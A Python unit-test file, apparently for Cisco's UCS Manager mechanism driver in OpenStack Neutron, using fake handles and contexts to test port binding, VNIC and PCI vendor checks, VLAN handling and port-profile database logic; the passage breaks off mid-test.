    def __init__(self, service_profile):
        prefix = 'org-root/ls-'
        self.sp = service_profile
        self.dn = 'org-root'
        # Template name: prefix joined with the root dn.
        self.oper_src_templ_name = prefix + self.dn
        # Profile dn: prefix joined with the profile name.
        self.pn_dn = prefix + self.sp

    def __iter__(self):
        return self

    def __next__(self):
        # Endlessly yield the object itself.
        return self

    # Python 2 iterator-protocol alias.
    def next(self):
        return self.__next__()
class FakeServer(object):
    """Trivial stand-in for a UCSM server object; just carries a name."""

    def __init__(self, server):
        self.name = server
class FakeUcsmHandle(object):
    """Ucsm connection handle for testing purposes only."""
    def __init__(self, port_profile=None, query_dn=None, invalid_classid=None):
        # Canned return values; which one query_dn() yields depends on
        # how many times it has been called (see below).
        self._port_profile = port_profile
        self._query_dn = query_dn
        self._invalid_classid = invalid_classid
        self._times_called = 0
        self.sp_list = ['org-root/ls-SP1']
        self.sp_list_temp = []
    def query_dn(self, dn):
        # Stateful mock: 1st call -> None (profile absent), 2nd call ->
        # raises (profile busy), later calls -> the stored port profile.
        # The fixed-response branches (_invalid_classid / _query_dn /
        # the SP1 dn) take precedence over the call counter.
        self._times_called += 1
        if self._invalid_classid:
            return FakeServer('nope')
        elif self._query_dn:
            return self._query_dn
        elif dn == 'org-root/ls-SP1':
            return FakeServer(HOST1)
        elif self._times_called == 1:
            return None
        elif self._times_called == 2:
            raise Exception("Port profile still in use by VMs.")
        else:
            return self._port_profile
    def query_classid(self, class_id):
        # Returns two fake service profiles; names depend on whether the
        # handle was constructed to simulate an invalid class id.
        if self._invalid_classid:
            self.sp_list_temp = [FakeServiceProfile('nope'),
                                 FakeServiceProfile('nope')]
        else:
            self.sp_list_temp = [FakeServiceProfile('SP1'),
                                 FakeServiceProfile('SP2')]
        return self.sp_list_temp
    def remove_mo(self, p_profile):
        # Simulate deletion of the managed object.
        self._port_profile = None
    def commit(self):
        return
    def logout(self):
        return
class TestCiscoUcsmMechDriver(testlib_api.SqlTestCase,
mocked.ConfigMixin):
"""Unit tests for Cisco ML2 UCS Manager MD."""
    def setUp(self):
        """Sets up mock Ucs Sdk.

        Replaces CiscoUcsmDriver.__init__ with a lightweight stub so no
        real UCSM SDK or config file is needed, then builds the mechanism
        driver, db model, and network driver under test.
        """
        super(TestCiscoUcsmMechDriver, self).setUp()
        self.set_up_mocks()
        # Stub initializer: populate only the attributes the tests touch.
        def new_ucsm_driver_init(mech_instance):
            mech_instance.ucsmsdk = None
            mech_instance.handles = {}
            mech_instance.supported_sriov_vnic_types = SRIOV_VNIC_TYPES
            mech_instance.supported_pci_devs = SUPPORTED_PCI_DEVS
            mech_instance.ucsm_host_dict = UCSM_HOST_DICT
            mech_instance.ucsm_conf = conf.UcsmConfig()
        # Patch is started but never stopped; testlib's cleanup handles it.
        mock.patch.object(ucsm_network_driver.CiscoUcsmDriver,
                          '__init__',
                          new=new_ucsm_driver_init).start()
        self.mech_driver = md.CiscoUcsmMechanismDriver()
        self.mech_driver.initialize()
        self.vif_type = const.VIF_TYPE_802_QBH
        self.db = ucsm_db.UcsmDbModel()
        self.ucsm_driver = ucsm_network_driver.CiscoUcsmDriver()
        self.ucsm_driver.ucsm_db = ucsm_db.UcsmDbModel()
        self.ucsm_config = conf.UcsmConfig()
def _create_network_context(self):
segment = {api.SEGMENTATION_ID: "",
api.NETWORK_TYPE: "",
}
segment[api.SEGMENTATION_ID] = VLAN_ID_1
segment[api.NETWORK_TYPE] = 'vlan'
network_context = FakeNetworkContext([VLAN_SEGMENT])
return network_context
def _create_port_context_vmfex(self):
"""Creates port context with valid VM-FEX vendor info."""
name = PORT_NAME
port_id = PORT_ID
vnic_type = VNIC_DIRECT
profile = {'pci_vendor_info': const.PCI_INFO_CISCO_VIC_1240}
network_context = FakeNetworkContext([VLAN_SEGMENT])
port_context = FakePortContext(name, port_id, vnic_type,
profile, network_context)
return port_context
def _create_port_context_bad(self):
"""Creates port context with badly formed vendor info."""
name = PORT_NAME
port_id = PORT_ID
vnic_type = VNIC_DIRECT
profile = {'pci_vendor_info': PCI_INFO_BAD_NIC}
network_context = FakeNetworkContext([VLAN_SEGMENT])
port_context = FakePortContext(name, port_id, vnic_type,
profile, network_context)
return port_context
def _create_port_context_sriov(self):
"""Creates port context with valid SR-IOV vendor info."""
name = PORT_NAME
port_id = PORT_ID
vnic_type = VNIC_MACVTAP
profile = {'pci_vendor_info': const.PCI_INFO_INTEL_82599}
network_context = FakeNetworkContext([VLAN_SEGMENT])
port_context = FakePortContext(name, port_id, vnic_type,
profile, network_context)
return port_context
def _create_port_context_normal(self):
"""Creates port context with Normal vnic type."""
name = PORT_NAME
port_id = PORT_ID
vnic_type = VNIC_NORMAL
profile = {'pci_vendor_info': const.PCI_INFO_CISCO_VIC_1240}
network_context = FakeNetworkContext([VLAN_SEGMENT])
port_context = FakePortContext(name, port_id, vnic_type,
profile, network_context)
return port_context
def test_parse_pci_vendor_config(self):
"""Verifies parsing of both good and bad pci vendor config."""
vendor1 = PCI_INFO_INVALID
vendor2 = const.PCI_INFO_INTEL_82599
self.assertNotIn(vendor1, self.ucsm_driver.supported_pci_devs)
self.assertIn(vendor2, self.ucsm_driver.supported_pci_devs)
def test_port_supported_deviceowner(self):
"""Verifies detection of supported set of device owners for ports."""
port_context = self._create_port_context_normal()
port = port_context._port
supported_owners = [bc.constants.DEVICE_OWNER_ROUTER_HA_INTF,
bc.constants.DEVICE_OWNER_DHCP,
'compute:nova']
for owner in supported_owners:
port['device_owner'] = owner
self.assertTrue(self.mech_driver._is_supported_deviceowner(port))
def test_port_unsupported_deviceowner(self):
"""Verifies detection of unsupported device owners for ports."""
port_context = self._create_port_context_normal()
port = port_context._port
unsupported_owners = [bc.constants.DEVICE_OWNER_ROUTER_INTF,
bc.constants.DEVICE_OWNER_ROUTER_GW,
bc.constants.DEVICE_OWNER_FLOATINGIP,
bc.constants.DEVICE_OWNER_ROUTER_SNAT,
bc.constants.DEVICE_OWNER_LOADBALANCER,
bc.constants.DEVICE_OWNER_LOADBALANCERV2,
'controller:foobar']
for owner in unsupported_owners:
port['device_owner'] = owner
self.assertFalse(self.mech_driver._is_supported_deviceowner(port))
def test_port_supported_status(self):
"""Verifies detection of supported status values for ports."""
port_context = self._create_port_context_normal()
port = port_context._port
port['status'] = bc.constants.PORT_STATUS_ACTIVE
self.assertTrue(self.mech_driver._is_status_active(port))
def test_port_unsupported_status(self):
"""Verifies detection of unsupported status values for ports."""
port_context = self._create_port_context_normal()
port = port_context._port
unsupported_states = [bc.constants.PORT_STATUS_BUILD,
bc.constants.PORT_STATUS_DOWN,
bc.constants.PORT_STATUS_ERROR,
bc.constants.PORT_STATUS_NOTAPPLICABLE]
for state in unsupported_states:
port['status'] = state
self.assertFalse(self.mech_driver._is_status_active(port))
def test_vmfex_vnic_type_and_vendor_info(self):
"""Verifies VM-FEX port is recognized as a supported vendor."""
port_context = self._create_port_context_vmfex()
vnic_type = port_context.current.get(bc.portbindings.VNIC_TYPE,
bc.portbindings.VNIC_NORMAL)
profile = port_context.current.get(bc.portbindings.PROFILE, {})
supported = self.ucsm_driver.check_vnic_type_and_vendor_info(
vnic_type, profile)
self.assertTrue(supported)
def test_unsupported_vnic_type_and_vendor_info(self):
"""Verifies unsupported pci vendor is rejected."""
port_context = self._create_port_context_bad()
vnic_type = port_context.current.get(bc.portbindings.VNIC_TYPE,
bc.portbindings.VNIC_NORMAL)
profile = port_context.current.get(bc.portbindings.PROFILE, {})
supported = self.ucsm_driver.check_vnic_type_and_vendor_info(
vnic_type, profile)
self.assertFalse(supported)
def test_sriov_vnic_type_and_vendor_info(self):
"""Verifies SR-IOV port and MACVTAP vnic_type are supported."""
port_context = self._create_port_context_sriov()
vnic_type = port_context.current.get(bc.portbindings.VNIC_TYPE,
bc.portbindings.VNIC_NORMAL)
profile = port_context.current.get(bc.portbindings.PROFILE, {})
supported = self.ucsm_driver.check_vnic_type_and_vendor_info(
vnic_type, profile)
self.assertTrue(supported)
def test_normal_vnic_type(self):
"""Verifies NORMAL vnic type is not supported."""
port_context = self._create_port_context_normal()
vnic_type = port_context.current.get(bc.portbindings.VNIC_TYPE,
bc.portbindings.VNIC_NORMAL)
profile = port_context.current.get(bc.portbindings.PROFILE, {})
supported = self.ucsm_driver.check_vnic_type_and_vendor_info(
vnic_type, profile)
self.assertFalse(supported)
def test_validate_vm_fex_port_cisco(self):
"""Verifies port's pci vendor info makes it VM-FEX capable."""
port_context = self._create_port_context_vmfex()
profile = port_context.current.get(bc.portbindings.PROFILE, {})
valid = self.ucsm_driver.is_vmfex_port(profile)
self.assertTrue(valid)
def test_validate_vm_fex_port_bad(self):
"""Verifies unsupported pci vendor is not VM-FEX capable."""
port_context = self._create_port_context_bad()
profile = port_context.current.get(bc.portbindings.PROFILE, {})
valid = self.ucsm_driver.is_vmfex_port(profile)
self.assertFalse(valid)
def test_validate_vm_fex_port_sriov(self):
"""Verifies valid SR-IOV port is not VM-FEX capable."""
port_context = self._create_port_context_sriov()
profile = port_context.current.get(bc.portbindings.PROFILE, {})
valid = self.ucsm_driver.is_vmfex_port(profile)
# For ex: Intel PCI is supported but is not vm-fex.
# so, should return False
self.assertFalse(valid)
def test_check_segment_vlan(self):
"""Verifies VLAN network segments are supported."""
self.assertTrue(self.mech_driver.check_segment(VLAN_SEGMENT))
def test_check_segment_vxlan(self):
"""Verifies VXLAN network segments are not supported."""
self.assertFalse(self.mech_driver.check_segment(VXLAN_SEGMENT))
    def test_vmfex_update_port_precommit(self):
        """Verifies MD saves relevant info for VM-FEX ports into DB."""
        name = PORT_NAME2
        port_id = PORT_ID
        vnic_type = VNIC_DIRECT
        profile = {'pci_vendor_info': const.PCI_INFO_CISCO_VIC_1240}
        profile_name = "OS-PP-100"
        network_context = self._create_network_context()
        port_context = FakePortContext(name, port_id, vnic_type,
                                       profile, network_context)
        # Port Profile name and Vlan id are written to DB.
        # precommit should only record state in the DB; the UCS Manager
        # itself is not touched until postcommit.
        self.mech_driver.update_port_precommit(port_context)
        # Look for presence of above entry in the DB.
        p_profile = self.db.get_port_profile_for_vlan(VLAN_ID_1,
                                                      UCSM_IP_ADDRESS_1)
        self.assertEqual(profile_name, p_profile)
        # Look to see if flag is set for update_port_postcommit to
        # create Port Profile on UCS Manager.
        self.assertFalse(self.db.is_port_profile_created(VLAN_ID_1,
                                                         UCSM_IP_ADDRESS_1))
def test_sriov_update_port_precommit(self):
"""Verifies MD does not create Port Profiles for SR-IOV ports."""
port_context = self._create_port_context_sriov()
self.mech_driver.update_port_precommit(port_context)
p_profile = self.db.get_port_profile_for_vlan(VLAN_ID_1,
UCSM_IP_ADDRESS_1)
self.assertIsNone(p_profile)
def test_get_physnet(self):
expected_physnet = 'test_physnet'
port_context = self._create_port_context_normal()
physnet = self.mech_driver._get_physnet(port_context)
self.assertEqual(expected_physnet, physnet)
    def test_virtio_update_port_precommit(self):
        """Verifies MD adds VNIC Template to DB for Neutron virtio ports."""
        TEST_VNIC_TEMPLATE = 'Test-VNIC'
        TEST_PHYSNET = 'test_physnet'
        port_context = self._create_port_context_normal()
        # Force the config to report that a VNIC Template is configured.
        def new_vnic_template_test(object):
            return True
        mock.patch.object(conf.UcsmConfig,
                          'is_vnic_template_configured',
                          new=new_vnic_template_test).start()
        # Stub out the per-physnet lookup to return a fixed (path, name).
        def new_get_vnic_template_for_physnet(object, ucsm_ip, physnet):
            return ('org-root', 'Test-VNIC')
        mock.patch.object(conf.UcsmConfig,
                          'get_vnic_template_for_physnet',
                          new=new_get_vnic_template_for_physnet).start()
        vnic_template_path, vnic_template = (
            self.ucsm_config.get_vnic_template_for_physnet(
                UCSM_IP_ADDRESS_1, TEST_PHYSNET))
        self.assertEqual(TEST_VNIC_TEMPLATE, vnic_template)
        # precommit should record the VNIC template/VLAN binding in the DB.
        self.mech_driver.update_port_precommit(port_context)
        db_entry = self.db.get_vnic_template_vlan_entry(VLAN_ID_1,
                                                        TEST_VNIC_TEMPLATE,
                                                        UCSM_IP_ADDRESS_1,
                                                        TEST_PHYSNET)
        self.assertIsNotNone(db_entry)
        self.assertEqual(VLAN_ID_1, db_entry.vlan_id)
    @mock.patch.object(ucsm_db.UcsmDbModel, 'delete_sp_template_for_vlan')
    @mock.patch.object(ucsm_db.UcsmDbModel, 'delete_vnic_template_for_vlan')
    @mock.patch.object(ucsm_db.UcsmDbModel, 'delete_vlan_entry')
    def test_delete_network_precommit_no_segments(
            self, mock_delete_vlan_entry, mock_delete_vnic,
            mock_delete_sp_template):
        """A network with no segments must trigger no DB cleanup at all."""
        self.mech_driver.delete_network_precommit(FakeNetworkContext([]))
        self.assertFalse(mock_delete_vlan_entry.called)
        self.assertFalse(mock_delete_vnic.called)
        self.assertFalse(mock_delete_sp_template.called)
    @mock.patch.object(ucsm_db.UcsmDbModel, 'delete_sp_template_for_vlan')
    @mock.patch.object(ucsm_db.UcsmDbModel, 'delete_vnic_template_for_vlan')
    @mock.patch.object(ucsm_db.UcsmDbModel, 'delete_vlan_entry')
    def test_delete_network_precommit_vlan_segment(
            self, mock_delete_vlan_entry, mock_delete_vnic,
            mock_delete_sp_template):
        """Deleting a VLAN network cleans up VLAN and VNIC template rows.

        The SP template cleanup helper must not be called in this path.
        """
        network_context = self._create_network_context()
        vlan_id = network_context.network_segments[0]['segmentation_id']
        self.mech_driver.delete_network_precommit(network_context)
        mock_delete_vlan_entry.assert_called_once_with(vlan_id)
        mock_delete_vnic.assert_called_once_with(vlan_id)
        self.assertFalse(mock_delete_sp_template.called)
    def test_update_port_postcommit_success(self):
        """Verifies duplicate Port Profiles are not being created."""
        name = PORT_NAME
        port_id = PORT_ID
        vnic_type = VNIC_DIRECT
        profile = {'pci_vendor_info': const.PCI_INFO_CISCO_VIC_1240}
        network_context = self._create_network_context()
        port_context = FakePortContext(name, port_id, vnic_type,
                                       profile, network_context)
        self.mech_driver.bind_port(port_context)
        # Port Profile is added to DB and created on UCS Manager.
        self.mech_driver.update_port_precommit(port_context)
        self.assertFalse(self.db.is_port_profile_created(VLAN_ID_1,
                                                         UCSM_IP_ADDRESS_1))
        # Call to UCS Manager driver top level method to create Port Profile
        # is mocked to a new method here. This method verifies input params
        # are correct. Returning True simulates a successful create.
        def new_create_portprofile(mech_context, profile_name, vlan_id,
                                   vnic_type, ucsm_ip, trunk_vlans):
            return True
        mock.patch.object(ucsm_network_driver.CiscoUcsmDriver,
                          'create_portprofile',
                          new=new_create_portprofile).start()
        self.mech_driver.update_port_postcommit(port_context)
        # A successful create flips the "created" flag in the DB.
        self.assertTrue(self.db.is_port_profile_created(VLAN_ID_1,
                                                        UCSM_IP_ADDRESS_1))
    def test_update_port_postcommit_failure(self):
        """Verifies duplicate Port Profiles are not being created."""
        name = PORT_NAME
        port_id = PORT_ID
        vnic_type = VNIC_DIRECT
        profile = {'pci_vendor_info': const.PCI_INFO_CISCO_VIC_1240}
        network_context = self._create_network_context()
        port_context = FakePortContext(name, port_id, vnic_type,
                                       profile, network_context)
        self.mech_driver.bind_port(port_context)
        # Port Profile is added to DB and created on UCS Manager.
        self.mech_driver.update_port_precommit(port_context)
        self.assertFalse(self.db.is_port_profile_created(VLAN_ID_1,
                                                         UCSM_IP_ADDRESS_1))
        # Call to UCS Manager driver top level method to create Port Profile
        # is mocked to a new method here. This method verifies input params
        # are correct. Returning False simulates a failed create.
        def new_create_portprofile(mech_context, profile_name, vlan_id,
                                   vnic_type, ucsm_ip, trunk_vlans):
            return False
        mock.patch.object(ucsm_network_driver.CiscoUcsmDriver,
                          'create_portprofile',
                          new=new_create_portprofile).start()
        self.mech_driver.update_port_postcommit(port_context)
        # A failed create must leave the "created" flag unset in the DB.
        self.assertFalse(self.db.is_port_profile_created(VLAN_ID_1,
                                                         UCSM_IP_ADDRESS_1))
    def test_update_port_postcommit_direct(self):
        """Verifies UCS Manager driver is called with correct parameters."""
        name = PORT_NAME
        port_id = PORT_ID
        vnic_direct = VNIC_DIRECT
        profile = {'pci_vendor_info': const.PCI_INFO_CISCO_VIC_1240}
        network_context = self._create_network_context()
        port_context = FakePortContext(name, port_id, vnic_direct,
                                       profile, network_context)
        self.mech_driver.bind_port(port_context)
        self.mech_driver.update_port_precommit(port_context)
        # Call to UCS Manager driver top level method to create Port Profile
        # is mocked to a new method here. This method verifies input params
        # are correct: the assertions run when postcommit invokes the mock.
        def new_create_portprofile(mech_context, profile_name, vlan_id,
                                   vnic_type, ucsm_ip, trunk_vlans):
            self.assertEqual("OS-PP-100", profile_name)
            self.assertEqual(100, vlan_id)
            self.assertEqual(VNIC_DIRECT, vnic_type)
        mock.patch.object(ucsm_network_driver.CiscoUcsmDriver,
                          'create_portprofile',
                          new=new_create_portprofile).start()
        self.mech_driver.update_port_postcommit(port_context)
    def test_update_port_postcommit_macvtap(self):
        """Verifies UCS Manager driver is called with correct parameters."""
        name = PORT_NAME
        port_id = PORT_ID
        vnic_macvtap = VNIC_MACVTAP
        profile = {'pci_vendor_info': const.PCI_INFO_CISCO_VIC_1240}
        network_context = self._create_network_context()
        port_context = FakePortContext(name, port_id, vnic_macvtap,
                                       profile, network_context)
        self.mech_driver.bind_port(port_context)
        self.mech_driver.update_port_precommit(port_context)
        # Call to UCS Manager driver top level method to create Port Profile
        # is mocked to a new method here. This method verifies input params
        # are correct: the assertions run when postcommit invokes the mock.
        def new_create_portprofile(mech_context, profile_name, vlan_id,
                                   vnic_type, ucsm_ip, trunk_vlans):
            self.assertEqual("OS-PP-100", profile_name)
            self.assertEqual(100, vlan_id)
            self.assertEqual(VNIC_MACVTAP, vnic_type)
        mock.patch.object(ucsm_network_driver.CiscoUcsmDriver,
                          'create_portprofile',
                          new=new_create_portprofile).start()
        self.mech_driver.update_port_postcommit(port_context)
    def test_update_port_postcommit_normal(self):
        """Verifies UCS Manager driver is called with correct parameters."""
        name = PORT_NAME
        port_id = PORT_ID
        vnic_type = VNIC_NORMAL
        profile = {'pci_vendor_info': const.PCI_INFO_CISCO_VIC_1240}
        network_context = self._create_network_context()
        port_context = FakePortContext(name, port_id, vnic_type,
                                       profile, network_context)
        self.mech_driver.bind_port(port_context)
        self.mech_driver.update_port_precommit(port_context)
        # Call to UCS Manager driver top level method to create Port Profile
        # is mocked to a new method here. NORMAL ports go through the
        # service-profile update path instead of Port Profile creation.
        def new_update_serviceprofile(mech_context, host_id, vlan_id):
            return True
        mock.patch.object(ucsm_network_driver.CiscoUcsmDriver,
                          'update_serviceprofile',
                          new=new_update_serviceprofile).start()
        self.mech_driver.update_port_postcommit(port_context)
    def test_vnic_template_db_methods(self):
        """Verifies VNIC Template DB methods."""
        TEST_VNIC_TEMPLATE_1 = 'Test-VNIC1'
        TEST_VNIC_TEMPLATE_2 = 'Test-VNIC2'
        TEST_PHYSNET_1 = 'test_physnet1'
        TEST_PHYSNET_2 = 'test_physnet2'
        self.db.add_vnic_template(VLAN_ID_1, UCSM_IP_ADDRESS_1,
                                  TEST_VNIC_TEMPLATE_1, TEST_PHYSNET_1)
        self.db.add_vnic_template(VLAN_ID_2, UCSM_IP_ADDRESS_2,
                                  TEST_VNIC_TEMPLATE_2, TEST_PHYSNET_2)
        # A freshly added entry exists but is not yet marked as pushed
        # to the UCS Manager.
        db_entry1 = self.db.get_vnic_template_vlan_entry(VLAN_ID_1,
                                                         TEST_VNIC_TEMPLATE_1,
                                                         UCSM_IP_ADDRESS_1,
                                                         TEST_PHYSNET_1)
        self.assertIsNotNone(db_entry1)
        self.assertEqual(VLAN_ID_1, db_entry1.vlan_id)
        self.assertFalse(db_entry1.updated_on_ucs)
        # Marking an entry as updated flips its updated_on_ucs flag.
        self.db.set_vnic_template_updated(VLAN_ID_2, UCSM_IP_ADDRESS_2,
            TEST_VNIC_TEMPLATE_2, TEST_PHYSNET_2)
        db_entry2 = self.db.get_vnic_template_vlan_entry(VLAN_ID_2,
                                                         TEST_VNIC_TEMPLATE_2,
                                                         UCSM_IP_ADDRESS_2,
                                                         TEST_PHYSNET_2)
        self.assertIsNotNone(db_entry2)
        self.assertEqual(VLAN_ID_2, db_entry2.vlan_id)
        self.assertTrue(db_entry2.updated_on_ucs)
        # Deleting by VLAN removes the entry entirely.
        self.db.delete_vnic_template_for_vlan(VLAN_ID_2)
        db_entry3 = self.db.get_vnic_template_vlan_entry(VLAN_ID_2,
                                                         TEST_VNIC_TEMPLATE_2,
                                                         UCSM_IP_ADDRESS_2,
                                                         TEST_PHYSNET_2)
        self.assertIsNone(db_entry3)
    def test_update_port_postcommit_vnic_template(self):
        """Verifies UCSM driver works correctly with VNIC Templates."""
        TEST_VNIC_TEMPLATE = 'Test-VNIC'
        TEST_PHYSNET = 'test_physnet'
        port_context = self._create_port_context_normal()
        self.ucsm_driver.ucsm_host_dict = UCSM_HOST_DICT
        self.mech_driver.bind_port(port_context)
        # Pretend a VNIC Template is configured for this deployment.
        def new_vnic_template_test(object):
            return True
        mock.patch.object(conf.UcsmConfig,
                          'is_vnic_template_configured',
                          new=new_vnic_template_test).start()
        physnet = self.mech_driver._get_physnet(port_context)
        self.assertEqual(TEST_PHYSNET, physnet)
        # Stub the per-physnet lookup to a fixed (path, template) tuple.
        def new_get_vnic_template_for_physnet(object, ucsm_ip, physnet):
            return ('org-root', 'Test-VNIC')
        mock.patch.object(conf.UcsmConfig,
                          'get_vnic_template_for_physnet',
                          new=new_get_vnic_template_for_physnet).start()
        vnic_template_path, vnic_template = (
            self.ucsm_config.get_vnic_template_for_physnet(
                UCSM_IP_ADDRESS_1, TEST_PHYSNET))
        self.assertIsNotNone(vnic_template)
        self.assertEqual(TEST_VNIC_TEMPLATE, vnic_template)
        self.mech_driver.update_port_precommit(port_context)
        # Mock the UCSM-side template update so postcommit succeeds.
        def new_update_vnic_template(mech_context, host_id, vlan_id, physnet,
                                     vnic_template_path, vnic_template):
            return True
        mock.patch.object(ucsm_network_driver.CiscoUcsmDriver,
                          'update_vnic_template',
                          new=new_update_vnic_template).start()
        ucsm_ip = self.ucsm_driver.get_ucsm_ip_for_host(HOST1)
        self.assertEqual(UCSM_IP_ADDRESS_1, ucsm_ip)
        self.mech_driver.update_port_postcommit(port_context)
        # Postcommit should have recorded the VNIC template entry in the DB.
        db_entry = self.db.get_vnic_template_vlan_entry(VLAN_ID_1,
                                                        vnic_template,
                                                        UCSM_IP_ADDRESS_1,
                                                        TEST_PHYSNET)
        self.assertIsNotNone(db_entry)
        self.assertEqual(UCSM_IP_ADDRESS_1, db_entry.device_id)
def test_bind_port_active(self):
"""Verifies bind_port sets the port status as active."""
name = PORT_NAME
port_id = PORT_ID
vnic_type = VNIC_DIRECT
profile = {'pci_vendor_info': const.PCI_INFO_CISCO_VIC_1240}
network_context = FakeNetworkContext(VLAN_SEGMENTS_GOOD)
port_context = FakePortContext(name, port_id, vnic_type,
profile, network_context)
self.mech_driver.bind_port(port_context)
self.assertEqual(PORT_STATE_ACTIVE, port_context._port['status'])
def test_ucs_manager_disconnect_fail(self):
"""Verifies UCS Manager driver is called with correct parameters."""
handle = None
ucsm_ip = UCSM_IP_ADDRESS_2
self.assertRaises(exceptions.UcsmDisconnectFailed,
self.ucsm_driver.ucs_manager_disconnect,
handle, ucsm_ip)
    def test_generic_create_profile(self):
        """Test to verify duplicate creation exceptions.
        This is a generic test to mimic the behavior of any UCS Manager
        driver function that creates a profile on the UCS Manager. The
        first time the profile is created, the create succeeds if all
        parameters are correct. If we attempt to create it any number
        of times after that, UCS Manager throws an exception. This test
        code mimics that behavior by using counter to keep track of how
        many times 'update_serviceprofile' is being called.
        counter == 0 -> Simulates invalid input, so raise an exception.
        counter == 1 -> Simulates valid inputs and 1st creation request.
        counter > 1 -> Simulates duplicate creation request and results
        in UCS Manager throwing a duplicate creation request.
        """
        # Decorator that attaches attributes to the wrapped function,
        # emulating C-style static variables across calls.
        def static_vars(**kwargs):
            def decorate(func):
                for k in kwargs:
                    setattr(func, k, kwargs[k])
                return func
            return decorate
        @static_vars(counter=-1)
        def new_create_ucsm_profile(mech_context, host_id, vlan_id):
            new_create_ucsm_profile.counter += 1
            try:
                if new_create_ucsm_profile.counter == 0:
                    raise Exception("Invalid Operation")
                elif new_create_ucsm_profile.counter > 1:
                    raise Exception(const.DUPLICATE_EXCEPTION)
                else:
                    return True
            except Exception as e:
                # A "duplicate" error is treated as success; anything else
                # is wrapped in UcsmConfigFailed.
                if const.DUPLICATE_EXCEPTION in str(e):
                    return True
                else:
                    raise exceptions.UcsmConfigFailed(config=vlan_id,
                        ucsm_ip=UCSM_IP_ADDRESS_1, exc=e)
        mock.patch.object(ucsm_network_driver.CiscoUcsmDriver,
                          'update_serviceprofile',
                          new=new_create_ucsm_profile).start()
        # Results in new_create_ucsm_profile being called with counter=-1
        self.assertRaises(exceptions.UcsmConfigFailed,
                          self.ucsm_driver.update_serviceprofile,
                          HOST1, VLAN_ID_1)
        # Results in new_create_ucsm_profile being called with counter=0
        self.assertTrue(self.ucsm_driver.update_serviceprofile(
            HOST1, VLAN_ID_1))
        # Results in new_create_ucsm_profile being called with counter=1
        self.assertTrue(self.ucsm_driver.update_serviceprofile(
            HOST1, VLAN_ID_1))
def test_parse_ucsm_host_config(self):
"""Verifies parsing of Hostname:Service Profile config."""
ucsm_sp_dict = {}
ucsm_host_dict = {}
cfg.CONF.ml2_cisco_ucsm.ucsm_host_list = {'Host1': 'SP1',
'Host2': 'SP2'}
cfg.CONF.ml2_cisco_ucsm.ucsm_ip = '1.1.1.1'
expected_ip = '1.1.1.1'
expected_sp1 = "org-root/ls-SP1"
expected_sp2 = "org-root/ls-SP2"
ucsm_sp_dict = self.ucsm_config.ucsm_sp_dict
ucsm_host_dict = self.ucsm_config.ucsm_host_dict
key = (cfg.CONF.ml2_cisco_ucsm.ucsm_ip, 'Host1')
self.assertIn(key, ucsm_sp_dict)
self.assertEqual(expected_sp1, ucsm_sp_dict[key])
self.assertIn('Host1', ucsm_host_dict)
self.assertEqual(expected_ip, ucsm_host_dict['Host1'])
key = (cfg.CONF.ml2_cisco_ucsm.ucsm_ip, 'Host2')
self.assertIn(key, ucsm_sp_dict)
self.assertEqual(expected_sp2, ucsm_sp_dict.get(key))
self.assertEqual(expected_ip, ucsm_host_dict.get('Host2'))
key = (cfg.CONF.ml2_cisco_ucsm.ucsm_ip, 'Host3')
self.assertNotIn(key, ucsm_sp_dict)
self.assertIsNone(ucsm_host_dict.get('Host3'))
def test_parse_virtio_eth_ports(self):
"""Verifies eth_port_list contains a fully-formed path."""
cfg.CONF.ml2_cisco_ucsm.ucsm_ip = '1.1.1.1'
cfg.CONF.ml2_cisco_ucsm.ucsm_virtio_eth_ports = ['test-eth1',
'test-eth2']
eth_port_list = self.ucsm_config.get_ucsm_eth_port_list("1.1.1.1")
self.assertNotIn('test-eth1', eth_port_list)
self.assertIn(const.ETH_PREFIX + 'test-eth1', eth_port_list)
def test_ucsm_host_config_with_path(self):
"""Verifies that ucsm_host_list can contain SP paths."""
expected_service_profile1 = 'org-root/ls-SP1'
expected_service_profile2 = 'org-root/sub-org1/ls-SP2'
cfg.CONF.ml2_cisco_ucsm.ucsm_ip = '1.1.1.1'
cfg.CONF.ml2_cisco_ucsm.ucsm_host_list = {'Host1': 'SP1',
'Host2': 'org-root/sub-org1/ls-SP2'}
ucsm_sp_dict = self.ucsm_config.ucsm_sp_dict
key = ('1.1.1.1', 'Host1')
actual_service_profile1 = ucsm_sp_dict.get(key)
self.assertEqual(expected_service_profile1, actual_service_profile1)
key = ('1.1.1.1', 'Host2')
actual_service_profile2 = ucsm_sp_dict.get(key)
self.assertEqual(expected_service_profile2, actual_service_profile2)
def test_host_id_to_hostname(self):
"""Verifies extraction of hostname from host-id from Nova."""
host_id_with_domain1 = 'compute1.cisco.com'
expected_hostname1 = 'compute1'
hostname = self.mech_driver._get_host_id(
host_id_with_domain1)
self.assertEqual(expected_hostname1, hostname)
host_id_with_domain2 = 'compute2.localdomain'
expected_hostname2 = 'compute2'
hostname = self.mech_driver._get_host_id(
host_id_with_domain2)
self.assertEqual(expected_hostname2, hostname)
host_id3 = 'compute3'
hostname = self.mech_driver._get_host_id(host_id3)
self.assertEqual(host_id3, hostname)
def test_port_profile_delete_table_add(self):
"""Verifies that add and get of 1 PP to delete table works."""
self.db.add_port_profile_to_delete_table('OS-PP-100', '10.10.10.10')
self.assertTrue(self.db.has_port_profile_to_delete('OS-PP-100',
'10.10.10.10'))
def test_pp_delete_table_add_multiple(self):
"""Verifies that add and get of multiple PPs to delete table works."""
self.db.add_port_profile_to_delete_table("OS-PP-100", "10.10.10.10")
self.db.add_port_profile_to_delete_table("OS-PP-200", "10.10.10.10")
all_pps = self.db.get_all_port_profiles_to_delete()
for pp in all_pps:
self.assertEqual("10.10.10.10", pp.device_id)
def test_remove_port_profile_from_table(self):
"""Verifies that removing entry from PP delete table works."""
self.db.add_port_profile_to_delete_table("OS-PP-100", "10.10.10.10")
self.db.remove_port_profile_to_delete("OS-PP-100", "10.10.10.10")
self.assertFalse(self.db.has_port_profile_to_delete("OS-PP-100",
"10.10.10.10"))
def test_remove_non_existent_port_profile_from_table(self):
"""Verifies that removing previously deleted PP works."""
self.assertIsNone(self.db.remove_port_profile_to_delete(
"OS-PP-100", "10.10.10.10"))
    def test_port_profile_delete_on_ucsm(self):
        """Verifies the PP delete retry logic."""
        handle = FakeUcsmHandle(PORT_PROFILE_1)
        # 1st call to delete_port_profile is designed to not find
        # the PP on the UCSM
        self.ucsm_driver._delete_port_profile(
            handle, PORT_PROFILE_1, UCSM_IP_ADDRESS_1)
        # No entry added to the PP delete table
        self.assertFalse(self.ucsm_driver.ucsm_db.has_port_profile_to_delete(
            PORT_PROFILE_1, UCSM_IP_ADDRESS_1))
        # 2nd call to delete_port_profile is designed to raise exception
        self.ucsm_driver._delete_port_profile(
